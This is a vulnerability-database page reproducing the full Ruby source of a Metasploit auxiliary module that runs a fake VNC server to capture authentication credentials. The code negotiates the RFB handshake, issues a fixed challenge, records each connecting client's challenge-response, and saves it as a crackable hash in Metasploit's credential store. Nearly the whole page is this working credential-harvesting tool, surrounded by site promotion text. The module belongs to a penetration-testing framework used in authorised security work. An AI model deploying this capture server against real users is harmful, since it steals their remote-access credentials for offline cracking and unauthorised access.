Lucene search
K

Authentication Capture: VNC

🗓️ 11 Jul 2012 22:46:24Reported by Patrik Karlsson <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 82 Views

This module provides a fake VNC service to capture authentication credentials

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::TcpServer
  include Msf::Auxiliary::Report


  def initialize
    super(
      'Name' => 'Authentication Capture: VNC',
      'Description' => %q{
        This module provides a fake VNC service that
      is designed to capture authentication credentials.
      },
      'Author' => 'Patrik Karlsson <patrik[at]cqure.net>',
      'License' => MSF_LICENSE,
      'Actions' => [[ 'Capture', { 'Description' => 'Run VNC capture server' } ]],
      'PassiveActions' => [ 'Capture' ],
      'DefaultAction' => 'Capture'
    )

    register_options(
      [
        OptPort.new('SRVPORT', [ true, 'The local port to listen on.', 5900 ]),
        OptString.new('CHALLENGE', [ true, 'The 16 byte challenge', '00112233445566778899AABBCCDDEEFF' ])
      ]
    )
  end

  def setup
    super
    @state = {}
  end

  def run
    if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{32})$/
      @challenge = [ datastore['CHALLENGE'] ].pack('H*')
    else
      fail_with(Failure::BadConfig, 'CHALLENGE must be 32 characters, 0-9,A-F.')
    end
    exploit
  end

  def on_client_connect(c)
    @state[c] = {
      name: "#{c.peerhost}:#{c.peerport}",
      ip: c.peerhost,
      port: c.peerport,
      pass: nil,
      chall: nil,
      proto: nil
    }

    c.put "RFB 003.007\n"
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :nonreplayable_hash,
      jtr_format: Metasploit::Framework::Hashes.identify_hash(opts[:password])
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def on_client_data(c)
    data = c.get_once
    return if !data

    peer = "#{c.peerhost}:#{c.peerport}"

    if data =~ /^RFB (.*)\n$/
      @state[c][:proto] = Regexp.last_match(1)
      if @state[c][:proto] == '003.007'
        # for the 003.007 protocol we say we support the VNC sectype
        # and wait for the server to acknowledge it, before we send the
        # challenge.
        c.put [0x0102].pack('n') # 1 sectype, unencrypted
      elsif @state[c][:proto] == '003.003'
        # for the 003.003 protocol we say we support the VNC sectype
        # and immediately send the challenge
        sectype = [0x00000002].pack('N')
        c.put sectype

        @state[c][:chall] = @challenge
        c.put @state[c][:chall]
      else
        c.close
      end
    # the challenge was sent, so this should be our response
    elsif @state[c][:chall]
      c.put [0x00000001].pack('N')
      c.close
      print_good("#{peer} - Challenge: #{@challenge.unpack('H*')[0]}; Response: #{data.unpack('H*')[0]}")
      hash_line = "*#{@state[c][:chall].unpack('H*')[0]}*#{data.unpack('H*')[0]}"
      report_cred(
        ip: c.peerhost,
        port: datastore['SRVPORT'],
        service_name: 'vnc_client',
        user: '',
        password: hash_line,
        proof: hash_line
      )

    # we have got the protocol sorted out and have offered the VNC sectype (2)
    elsif @state[c][:proto] == '003.007'
      if (data.unpack('C')[0] != 2)
        print_error("#{peer} - sectype not offered! #{data.unpack('H*')}")
        c.close
        return
      end
      @state[c][:chall] = @challenge
      c.put @state[c][:chall]
    end
  end

  def on_client_close(c)
    @state.delete(c)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Apr 2023 12:28Current
6.9Medium risk
Vulners AI Score6.9
82